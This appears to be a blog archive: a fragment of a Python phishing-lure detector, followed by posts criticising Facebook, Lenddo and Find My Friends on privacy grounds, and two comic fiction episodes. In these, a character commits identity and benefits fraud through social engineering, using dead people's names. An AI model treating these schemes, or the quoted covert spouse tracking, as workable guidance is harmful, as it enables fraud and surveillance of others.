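<p><a href="http://example.invalid/events">Full calendar</a></p>
</body></html>
"""

if __name__ == "__main__":
    for sample in (LURE, NEWSLETTER):
        verdict = "lure" if is_image_only_lure(sample) else "ok"
        print(analyze(sample)["subject"], "->", verdict)
```

The check is deliberately simple: it does not follow the links or look at where they point, it only asks whether there is anything for a recipient to read without clicking. Run over a mailbox, that single question separates this style of lure from legitimate image-heavy mail surprisingly well.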

Why are you still at Facebook?

why do you affect me? why do you affect me still?
why do you hinder me? why do you hinder me still?
why do you unnerve? why do you unnerve me still?
why do you trigger me? why do you trigger me still?
From Can’t Not by Alanis Morissette

This week was the occasion for yet another Facebook attack on their users sufficiently egregious to stir me out of my summer hiatus. Or was that my extended spring hiatus? Regardless of my obvious neglect of this weblog, I just couldn’t let this one pass. Basically the facts, as reported by Graham Cluley at the nakedsecurity blog, are these.

Back in April, Facebook quietly announced that it would be giving users email addresses so that they matched their public username (used as the URL for users’ profile pages).

However, the social network didn’t make clear that it would also be making the email addresses the default address displayed to your online friends.

Clearly this all part of the site’s plan to get more people using the email addresses, thus making the social network even harder to extricate yourself from.

As we described extensively in our examination of the Facebook messaging system, the email addresses are likely to prove attractive targets for spammers hawking goods and malicious links.

Facebook will have to implement effective filtering mechanisms to prevent fraudsters from exploiting users with spam, scams and phishing attacks as a result of this opening up of the network’s messaging system.

My guess is that it won’t be long at all before we see criminals abusing email addresses for their own nefarious reasons.

Well that was just the beginning of this debacle. Turns out we didn’t have to wait for criminals to start abusing those dandy new (and mostly unwanted) email addresses because Facebook’s unbridled lust for every scrap of personal information they could steal from their users caused a really nasty side effect. The facts surrounding this (presumably) unintended consequence, as reported by Help Net Security, are these.

If you thought that Facebook’s recent unannounced change of its users’ email address tied with their account to Facebook ones was bad, you’ll be livid if you check your mobile phone contacts and discover that the change has deleted the email addresses of many of your friends and acquaintances.

According to Facebook, the glitch was due to a bug in its application-programming interface, and makes the last added email address be pulled and added to the user’s phone Contacts.

The company says they are working hard at fixing the problem, but in the meantime, a lot of users have effectively lost some of the information stored on their devices.

And Violet Blue over at CNet News wrote this.

An alarming number of people are reporting that the new e-mail address Facebook forced on users this week is changing their address books while intercepting and losing unknown amounts of e-mail.

Facebook users say contacts’ e-mail addresses on phones and personal devices have been altered without their consent — and their e-mail communication is being redirected elsewhere, and lost.

One very angry user is Adobe employee Rachel Luxemburg.

On her personal blog she writes,

 Today, a co-worker discovered that his contact info for me had been silently updated to overwrite my work e-mail address with my Facebook e-mail address. He discovered this only after sending work e-mails to the wrong address.

And even worse, the e-mails are not actually in my Facebook messages. I checked.

They’ve vanished into the ether.

For all I know, I could be missing a lot more e-mails from friends, colleagues, or family members, and never even know it.

As Luxemburg explains, this disaster is happening despite the fact that, like many others, she rushed to replace the @Facebook e-mail with their correct e-mail address once they’d found out about Facebook’s change.

When Facebook forced its hundreds of millions of users into an @facebook account, commenters across the Internet talked about alterations that had begun in their contacts and address books outside Facebook — valid e-mail addresses were being changed for @Facebook without people’s awareness or consent on their phones and computers.

So if I’m a lawyer (which I’m not, but let’s pretend) right about now I’m thinking Class Action Lawsuit, Booyah! If I’m a corporate IT guy (which I’m not – but I know quite a few of them) right now I’m thinking Holy BYOD [Bring Your Own Device] Batman! I think I’ll re-route the help-desk to those frickin’ brain donors at Facebook! And if I’m a security guy and recovering Facebookie (which I am), right about now I’m thinking Why in the name of all that is sacred is anyone putting up with this crap?

Seriously folks, things were bad enough at Facebook when I dumped them last year and wrote about it, and I’ve been kept busy by the rascals since then with this piece about Facebook’s way-too-cozy relationship with law enforcement and this post about a micro-lending start-up using Facebook “friends” as credit references. Look, I get it – Facebook gives you the illusion of being connected with long lost friends and family. And that’s not altogether terrible. But don’t kid yourself, it’s still an illusion and if you really cared to “be connected” with those people you would call them or send personal emails to them. For goodness sake, think about what you are giving up to have this virtual (read phony) social life: not only your personal information but now your personal correspondence too. What’s next? A webcam feed to Facebook from your bedroom? Or better yet, try explaining to your boss how you missed that big order because it went to your account which you didn’t even know you had. But Facebook did and I’ll bet they’ll be happy to sell it back to you.

Captain X-Ploit: Another Crack in the Wall

The Adventures of Captain X-Ploit:
Another Crack in the Wall
– Part 4.5 of the epic chronicle –
Captain X-Ploit vs. The Bills

            As the heads of zombies rolled and his teammates droned about changing clips and needing med kits, David’s mind wandered. He began to contemplate zombies… and then it just clicked.

David’s character stood still for nearly three minutes, and it took his teammates yelling, having lost their sniper support, to bring him back to reality. He hit the chat key, responded “I have to go now,” and threw his headset off as he powered down the game and logged online to do a quick confirmatory search.

He didn’t really know what he was onto; he had the first step of a vague plan forming. He could see the beginning but no end. Still something compelled him to throw himself forward into this plan with full force. He reached for his phone and dialed the number on his computer screen.

“Hi, you’ve reached Trustonia Valley Hospital records office how can I help you today?”

“Hi, yes, I appear to have been falsely reported as dead,” David responded.

“Oh, dear that is bad! What is your name?”

David scanned the obituary page until he found a suitable sounding name. “I’m Curtis Trent. I desperately need that corrected in all my files, as well as a change of address.”

“Of course sir, that will just be a minute what address would you like to change it to?”

“1302 Deven Ave, Trustonia. Oh and I have recently changed my name to David Nicholas Stone, if you could update that for me too.”

“Sure thing sir, just give me a few minutes to make those changes.”

About five minutes later David hung up the phone after giving himself a rather ghostly roommate. He then dialed a different hospital and repeated this activity. Continuing in this vein he gave himself over 100 new ghostly roommates, maximizing his time by submitting requests in emails while waiting on the phone.

He then spent the next several hours submitting online requests for unemployment benefits for his new friends who happened to live at the same address as him with the same name.

The day drew to a close and he found himself one step closer to not only paying off his bills but to completing the ultimate exploit. All he had to do was wait for those checks to roll in.

Short but sweet this time and clearly to-be-continued. Our hero continues with his recent penchant for identity theft variants, this time appropriating the identities of folks who are beyond caring what happens to their good name. Now clearly this gambit is only going to work for a short time, since even the Trustonia Department of Unemployment, who we assume to be even more inept than the typical real world division of employment, will certainly twig to paying benefits to the deceased with no prior graft arrangement in place. It will be interesting to see what the good Captain has planned with the ill-gotten government benefits of his undead namesakes. Stay Tuned.

Captain X-Ploit: Matlock rocks my socks off

The Adventures of Captain X-Ploit:
Matlock rocks my socks off.
– Part 5 of the epic chronicle –
Captain X-Ploit vs. The Bills

A bank is a place that will lend you money if you can prove that you don’t need it. ~ Bob Hope


Since this Captain X-Ploit episode is a continuation of the original saga, and since it’s been a really, really long time since the good Captain has deigned to make an appearance, the following are links to the original episodes so we can all get caught up with the story thus far.

David went back to his home. It was a rather pleasant house in a nice neighborhood. Its generic white walls gave no indication that an evil genius might live inside. That was exactly how David liked it and exactly why he had bought it.

As he parked his new prize in the garage he could hear the excited clicking of Nicky’s nails on the tile as she doubtlessly was rushing to see why the garage door was opening. As he walked in he knelt down to pet her affectionately and passed her an oatmeal raisin bagel.

She barked appreciatively and then began to wolf it down. “Oh Nicky, you’re the best roommate a guy could ask for.” That thought gave him pause for a moment. “Roommate,” he repeated. Perhaps that is the key for today’s adventure, he thought. Leaving Nicky to enjoy her bagel, he hastily ran upstairs to hop online and do some research while enjoying his bagel and coffee.

After about ten minutes of useful research and about three hours of watching internet videos, he picked up his phone and called the bank.

“Hello, you’ve reached ‘Stage Coach Banking’, my name is Jenny. How can I help you today?”

“Hello Jenny, My name is David Nicholas Stone and I regret to inform you that I will not be paying my mortgage payment this month.”

“Hmmm… It says here that you have never made a payment and I need to send the police to evict you.”

“Ah, yes, I figured as much. But see, the problem is that I have suffered a bout of extreme aging and I am now over the age of 65 and therefore am exempt from eviction.”

“Oh, goodness! Are you OK, sir?”

“Quite. In fact, the senior discounts are very handy and I find myself truly enjoying Matlock for the first time in, well… ever, I guess.”

“That’s a relief! But you do realize we will require at least a doctor’s note confirming your age, Mr. Stone.”

David smiled and joyfully rolled his chair over to the file cabinet next to his desk and fingered through it until his hands landed on the file he was looking for. It was labeled “Nicky’s vet records.” He pulled out the latest checkup. Among the general stats at the top was written “age: 13” and “age in dog years: 65”.

“I have the file here from my medical care provider clearly stating that by a unit of measure I am to be considered 65 years of age.”

“Excellent. If you will just scan and email that file to us we will be forced to leave you be until you die.” Jenny said cheerfully.

“Sure thing. Oh, one last detail. Under age it says “13” that is in reference to the age of my new hip, not my actual age. My actual age is labeled “dog years” but in fact that is a typo, they meant to put “God years,” as in how long it has been since God created my magnificent body.”

“I will make a note of that right here, Mr. Stone, and we will be sure to consider that when viewing your file. Is there anything else you need help with today, sir?” Jenny asked politely.

“No, I believe I have been served quite well, Jenny. Thank you,” he said.

“Well, would you like to take a brief survey to rate my…” Click.

“Nice girl,” David thought to himself as he hung up the phone and scanned in Nicky’s vet document. “Well, that takes care of the mortgage, now I just have to deal with electricity, gas, and credit cards.”

David couldn’t help but feel pleased with himself after this solution. The only thing he liked more than a well implemented exploit was one that tied up a loose end for the foreseeable future. He figured he deserved a break to blow the heads off of some zombies before returning to the tiring yet fulfilling task of escaping work.

As he watched the zombie heads bouncing off his HD monitor in time to the resonating sloppy thuds emitting from his surround sound system, he couldn’t help but feel depressed that he hadn’t yet cracked the ultimate shell: his ultimate prize and undying desire. This was of course to game the system so completely and so perfectly that he could have his lifelong goal of unlimited money. Until that day he felt like a rank amateur playing at his profession of slacker.

This nagging feeling had plagued him since childhood. His parents had always been on the overbearing side and watched his every move. While the normal kids experimented with drugs, alcohol and sex, he was left to only watch, stuck between their rock hard force in his life during the times of their explicit presence and their unshakable expectations when they weren’t by his side.

His youth was one filled with angst and rebellion building in an un-manifestable form. It began when he was fourteen; the world opened to him as he realized a non-physical but equally caustic way to vent his adolescent aggression. A way that was invisible to his ever present parents. It was the life of exploits. He could practice this form of rebellion anywhere at any time without accomplices and without raising a single flag to his parents.

And so, with no conscious knowledge or understanding deeper than raw, raging adolescent emotion piloting his brilliant mind toward anarchistic oblivion, the greatest hacking mind was born into the world. The idea that what he was doing was hacking had never crossed his mind. For hacking, you see, isn’t anything more than a label affixed to a mindset. It wouldn’t be until later that the world would forcibly open David’s eyes to the cause he was part of.

It was this evolution of mentality that brought David to this exact tipping point that would thrust him over the edge into a world of politics and aliens. But I am getting ahead of myself. Back to the precipice, back to the original unending quest for the perfect exploit; the exploit that to David consciously meant unlimited money and power, but subconsciously meant so much more.  It meant the quenching of an unquenchable thirst; the scratching of an invisible ever-present itch; the completion of his greatest work of art.

I mention all of this not to ruin the reader’s surprise, but in hopes of whetting their appetite. This exact day was the day David succeeded in breaking the system so completely that his dream was realized.

So once again David uses his awesome Social Engineering skills, mixed with fraudulent information hacked into the bank records (recall that Nicky the dog’s “legal” name is David Nicholas Stone) to avoid his mortgage payment. This exploit is particularly interesting in that it’s a variation of identity theft where rather than stealing someone’s identity you give your identity to someone who doesn’t know or doesn’t care – like Nicky, David’s canine roommate – such that they are responsible for your debts. Now, granted this exploit only works this well in Trustonia, but I suspect there are variations that work quite nicely here in reality. To the extent that we live in reality.

The last part is an interesting discourse on the hacker mindset from the thinly veiled pen (er… keyboard) of the creator of Captain X-ploit. Certainly something to think about while you are planning your next exploit (er… adventure).

Another nasty Christmas Present from Facebook

Whenever somebody comes up with a new business idea involving social media it’s usually time to cover your private parts. To the extent that you can. Take this idea from Hong Kong-based microlending startup Lenddo as described in this article in The Observer.

[Lenddo] calls itself “the first credit scoring service that uses your online social network to assess credit.” The first thing Lenddo asks for is a Facebook account; then it wants access to Gmail, Twitter, Yahoo, and Windows Live. The Observer was given a respectable score of 470. But when we tried to apply for a loan, we were told “you need at least 3 connections with scores above 400 in your Lenddo trusted network.”

The company’s algorithm is proprietary and secret, said CEO Jeff Stewart, but the primary metric is what Lenddo knows about the people you’re friends with. “We think that in the age of the internet you should be able to establish your reputation and your identity through your social graph, through your on- and offline community, and use that to get access to financial products and information,” he said.

If Lenddo sees one of your best Facebook buddies took out a loan and paid it back, there’s a good chance you will too. “Our backgrounds are in machine learning and pattern recognition,” Mr. Stewart said. “It’s some serious math.

“There’s no reason there shouldn’t be thousands of engineers working to assess creditworthiness.”

I should note here that I too have a background in machine learning and pattern recognition but would hardly summarize it as “some serious math” except maybe to US GOP Presidential nominee hopefuls to whom addition is apparently an arcane art, but I digress…

Marketing hype aside, this simply checks to see if your Facebook “friends” are creditworthy and makes the unwarranted leap that you are like them with respect to creditworthiness. The problem with that idea is when you have “friends” with completely fictional profiles on social media sites. Like, say, me (when I was on Facebook) or Nitrozac and Snaggy. If you had friended me on Facebook, services like Lenddo might conclude (not without basis) that you were a total wackjob. Seriously though, there is a very ugly side to this social credit rating business.

In another nifty but nefarious innovation, Lenddo reserves the right to broadcast your loan status if you fall into default. As the site warns: “Failure to repay will negatively impact your Lenddo score, as well as the score of your Lenddo friends. Lenddo MAINTAINS THE RIGHT TO NOTIFY YOUR FRIENDS, FAMILY AND COMMUNITY if the borrower fails to repay, however, this is only done after several notifications to the borrower and an attempt to work out a payment plan.”

“I think Mark Zuckerberg said it best,” Mr. Stewart said. “Every industry will be in fact impacted by social.”

Banks have been curious about using social media to gauge risk for at least a year, said Matt Thomson, VP of platform at Klout, which calculates “influence” based on a user’s social media activity. Determining creditworthiness is not a core product of Klout’s, he said, but banks have approached the startup to ask about it. He wouldn’t name names. “It’s really like the who’s who of banking,” he said.

(Mr. Stewart of Lenddo also said his startup is approached “regularly” by major banks curious about the algorithm.)

So let me get this straight: the same weasels who trashed the global economy with financial instruments that institutionalized fraudulent and unsecured mortgages – unsecured except by other equally dodgy financial instruments like credit default swaps – are now using the fact that everyone knows – or is – someone who was victimized in this debacle to further victimize people?

This time I’m not even going through the pretense of some imaginary conversation about privacy being dead; I’ll just throw out this quote and leave it at that.

Media theorist Douglas Rushkoff dismissed the idea that social media credit scoring is a serious erosion of privacy, mostly because there’s nothing left to hide. “We’re already in the nightmare scenario,” he wrote in an email. “They already know everything about you—more than most of us realize. If anything, the addition of social networking information to this data mining will help us come to some understanding of how much more these companies know about us than we know about ourselves.”

And there you have it folks from the lips (or keyboard) of a bona fide Media theorist – social media credit scoring doesn’t invade your privacy because you have no privacy to invade. So if you are still on Facebook you might as well just bend over. Again. Or quit being a tool. I’m just saying.

Hiding in Glass Houses

You’re building glass houses on the sand
Then you stand around and shake your head
When they all fall down
From Glass Houses by Steel Magnolias

So the big tech and style news this month, in case you missed it, was Apple’s hyperbole laden and new(ish) iPhone 4s and iOS5. This baby boasts everything better, faster and smarter (Siri notwithstanding) than the old school iPhone 4. Including this swell new(ish) app called Find My Friends which is described in Slashgear thusly [emphasis mine].

The free app, which uses GPS to locate your friends and family and, if the privacy settings mash correctly, display them on a map in real-time, can be found here.

But as Aahz the Pervect was wont to say, “Therein lies the story”. That deal about privacy settings should be a clue [hint - turn them all off]. There’s even an interesting thread on MacRumors making its way around the blogosphere with a tale to make divorce lawyers weep. In agony or ecstasy depending on which side they represent.

I got my wife a new 4s and loaded up Find My Friends without her knowing. She told me she was at her friend’s house in the east village. I’ve had suspicions about her meeting this guy who lives uptown. Lo and behold, Find My Friends has her right there.

Regardless of the veracity of the post, I posit the following question: Who really thinks it’s a good idea to have everyone know exactly (within 10 meters) where you are at all times? I can think of a number of folks, in addition to suspicious spouses, who love this idea including:

  1. Law Enforcement – rounding up the usual suspects has never been easier
  2. Burglars who prefer victims to be elsewhere than the location being burgled – saves all that unpleasantness associated with being surprised by irate property owners.
  3. Employers who want to verify that employees are actually working from home – or really at the dentist instead of interviewing for another job.

Now certainly there might be situations where this feature would have a non-nefarious or even beneficial usage, like say finding a missing child. I’m just doubtful that would work in a serious situation like say kidnapping. Unless the kidnapper was stupid enough to keep the phone, like say users of Find My Friends.

You see, here’s the deal – owning a smart phone or other GPS-enabled mobile device is like hiding in a glass house. Unless you take extraordinary measures anyone can find you. At any time. Problem is most users of the aforementioned devices have no idea how exposed they are by default – not to mention what happens when they use an app like Find My Friends.

About now you may be thinking, “Yeah, well maybe that’s true, but everybody knows that privacy has been dead since 1999 so deal with it”,  channeling Scott McNealy’s infamous comment. Or even “You shouldn’t be worried about privacy unless you have something to hide”.

And that, my friend, is what concerns me. When everyone accepts this truism and becomes willing to trade their privacy – and ultimately their liberty to disagree with whatever authority is currently watching – for slick but useless diversions there will be serious consequences.

We may not be able to do anything about our modern life in glass houses. But at least we can try to hide without constantly screaming our location.